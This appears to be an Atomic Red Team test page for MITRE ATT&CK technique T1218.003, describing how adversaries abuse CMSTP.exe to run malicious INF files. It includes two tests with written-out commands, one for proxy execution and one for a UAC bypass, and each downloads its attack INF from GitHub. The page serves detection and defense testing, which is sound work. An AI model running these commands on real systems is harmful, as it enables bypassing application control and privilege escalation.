Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
Supported Platforms: Windows
auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624
| Name | Description | Type | Default Value | |——|————-|——|—————| | inf_file_path | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003.inf|
1
command_prompt
!cmstp.exe /s "#{inf_file_path}"
1
powershell
!1
if (Test-Path "#{inf_file_path}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{inf_file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003.inf" -OutFile "#{inf_file_path}"
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
Supported Platforms: Windows
auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
| Name | Description | Type | Default Value | |——|————-|——|—————| | inf_file_uac | Path to the INF file | path | PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf|
1
command_prompt
!cmstp.exe /s "#{inf_file_uac}" /au
1
powershell
!1
if (Test-Path "#{inf_file_uac}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{inf_file_uac}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"